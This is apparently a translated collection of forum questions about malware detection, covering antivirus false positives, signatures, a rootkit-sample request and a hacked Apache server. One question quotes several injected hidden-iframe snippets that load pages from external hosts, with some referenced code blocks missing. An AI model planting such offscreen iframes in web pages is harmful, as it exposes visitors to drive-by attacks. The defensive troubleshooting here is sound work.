问题标签 [malware-detection]

我正在学习恶意软件（Blackhole Exploit）的工作原理，我从恶意代码中提取了 shellcode。除了搜索字节字符串之外，我想通了一切。谁可以帮我这个事？为什么这个 shellcode（大多数恶意 shellcode）会搜索这个特定的字符串？搜索代码如下：

我开发了一个不错的软件，我想在线发布它，我制作了一个不错的网站供下载，但似乎 Internet Explorer 和 Chrome 将我的软件识别为病毒并向用户发布下载警告如何安装它，我认为它正在为微软资源管理器使用 SmartScreen 并且 chrome 浏览器信息说这个信息

谁能建议我该怎么做？如何让我的软件下载获得批准？

我是开发新手，所以如果这是一个愚蠢的问题，我很抱歉......

谢谢你们

几个月前，隐藏的 iFrame 开始出现在我们专用服务器上每个站点的每个页面上。当我们使用 503 将站点停机进行维护时，iFrame 仍然在停机维护页面上。最终，宿主封锁了 iFrame 的来源，但我们始终没有找到后门。注入的 iFrame 看起来像这样，但包裹在一个样式标签中以进行混淆，并带有各种 URL：

iframe src="http://heusnsy.nl/32283947.html..

我们将较小的站点移到了不同​​的主机上，它们都很好。

我们将主站点移动到同一主机上的新专用服务器上，尽管我们努力锁定服务器 - 防火墙、限制访问、软件更新、检查每个文件 - iFrame 还是返回了。

我们到处寻找它是如何进入的 - 配置文件，htaccess - 但找不到它。

知道隐藏的 iFrame 注入漏洞可能在哪里吗？

编辑：这里有更多细节：运行 Apache 和 PHP 的 Linux 机器。一切的最新版本。注入的代码如下所示：

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

更新：这里有更多信息和我们学到的东西：

主机：Station CentOS Linux 6.3 - x86_64 上的 Linux 2.6.32-279.5.1.el6.x86_64 / Apache 版本 2.2.15 - PHP 5.3.3 (cli)（构建时间：2012 年 7 月 3 日 16:53:21）

1. 服务器本身没有受到损害。

2. 包括 (apache/php) 在内的所有服务都升级到我们系统可用的最新版本。

3. 没有帐户（ftp 或其他）受到损害。

4. 恶意软件在多个受感染站点上同时更改其目标 URL (iframe src=)。（由 unmaskparasites.com 提供）

5. 在更改 src 目标期间，没有执行/运行任何流氓或隐藏进程。

6. TCPDUMP 在离开端口 80 tcp 时获取了恶意软件的代码，但在接收恶意软件的用户的 GET 请求中没有发现任何奇怪的东西——在相应的 apache 访问日志中也没有发现任何奇怪的东西。

7. 在 iFrame 的 src url 地址切换期间，网站文件或 httpd/php 二进制文件没有以任何方式更改 - 由 md5sum 检查提供。

8. 在更改期间，未在已知端口上为已知服务建立恶意连接。防火墙负责其余的工作。

9. rkhunter 和 maldet 没有结果。

10. "</script>"恶意软件 iFrame在任何具有此标签的页面上的第一个标签之后被触发并注入，在此服务器上的所有帐户和网站上。

11. 恶意软件被注入到静态页面和没有数据库连接的站点上。<head> </script></head>（页面有标签就足够了）

12. 没有安装流氓 apache 模块或 php 模块（不包括 mycript.so）。大多数默认的 apache 模块都被挂起并被注释掉。

13. 恶意软件并非一直存在。它来来去去，有时会关闭几个小时，然后出现几个用户并再次熄灭。使其非常难以追踪。

14. 我们网站上运行的 100% 的 php 代码和大多数 javascript 代码（除了 phpmyadmin 之外）是自定义编码的。唯一不是 Jquery 库。

服务器是高流量机器，在日志中搜索/匹配非常慢。每周访问日志可能会超过 15GB。

情况就是这样……这不再是被盗帐户、被黑文件、流氓脚本的问题。这是迄今为止我们所见过的任何事情，原因隐藏在 apache/php 本身的某个地方。（至少这是我们的想法）。非常感谢任何帮助或想法。

以下是 iFrame 注入的示例：

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </   style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div> document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px}  </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>

我们正在制作一个软件 (C# / .NET 2.0)，该软件可在网站上下载。

现在这是一个只为少数客户提供的特殊程序。结果，许多防病毒程序（Norton、Mc Afee、Avira ......）不了解我们的程序并发出错误警报（“可疑......” - “社区不知道......”等。 ）。

许多客户感到不安全，或者不知道如何处理。

那么，一般情况下如何处理呢？我们可以添加某种“证明”来保证我们的程序没有病毒吗？

许多防病毒程序使用基于签名的恶意软件检测。这是为 ClamAV 创建签名。考虑到整个文件是恶意软件，我可以理解他们如何创建签名，但我不明白如何在文件正文中找到恶意软件 - 哈希将是另一个。有人知道吗？

作为我的论文，我正在研究一些用于 Linux 内核 Rootkit 检测的新技术。我需要一些 rootkit 样本来测试我的方法并进行一些机器学习测试。但不是在计算机历史书籍中也可以找到的 packetstorm 中尘土飞扬的旧版本。我已经阅读了很多关于它的内容，并且在 phrack 和其他一些资源中看到了一些 rootkit 实现的新方法。为我实现 PoC rootkit 将花费大量时间，届时我将开始我的项目。

如果有人可以帮助我，将不胜感激。任何站点、ftp、受感染的系统、未知的 rootkit 库，任何可能作为我工作样本的东西都将受到赞赏。但考虑到这一点，我需要的是Linux 内核 Rootkits。任何类型，LKM，系统调用挂钩，对象挂钩，system.map /dev/mem 工作的东西

谢谢

ps 新的 rootkit 我并不是说像未报道或全新闻的 rootkit，适用于 ubuntu 10.04 或更高版本的东西会很棒（内核版本 2.6.32+）

Chrome 说，当我访问我的网站时，搜索后我从网站上清理了我的代码，但 chrome 仍然显示然后我从我的网站上删除了所有文件，只是上传了 index.html（空白文件），但仍然显示警告。

我的网站中有几个 Js 文件，包括 jQuery。

谷歌说：

Google 上一次在该网络上测试网站是在 2013 年 2 月 14 日，最后一次发现可疑内容是在 2013 年 2 月 14 日。

您知道 Google 在什么情况下会检测到 Js 文件中的恶意软件吗？文件中的代码或恶意软件有问题？

我有一个 ASP.NET Web 应用程序，它允许用户将文件从他的 PC 上传到 SQL Server 数据库（稍后用于为标签生成图像）。是否有一种“简单”的方法可以在 .NET 中测试图像，以在保存之前验证它不包含任何恶意内容？

现在，我使用这个：

如果 TestBitmap 不是图像（例如，如果 Filename 是文本文件的名称），则创建 TestBitmap 会失败，但显然这不会阻止带有恶意代码的图像文件作为图像加载，因此保存它作为 MemoryStream 然后将流写入字节数组（稍后保存在数据库中）据说可以解决这个问题。

情况

有一个桌面应用程序的安装程序。当它运行时，它会解压缩一些可执行文件，执行它们，写入注册表等。每个可执行文件和安装程序本身都是由 out 团队编写的，不旨在对用户造成任何伤害，并使用有效的安全证书进行签名。无论如何，Malwarebytes AntiMalware 工具将其中一个可执行文件识别为 MSIL.downloader。

问题

我们怎样才能摆脱这种行为？

细节

• 我们的几个客户报告了这个问题。但是，当我在我的机器上使用相同的工具扫描文件时，它没有检测到其中的任何间谍软件。
• 我们有问题可执行文件的源代码，如果有帮助可以稍微重写它们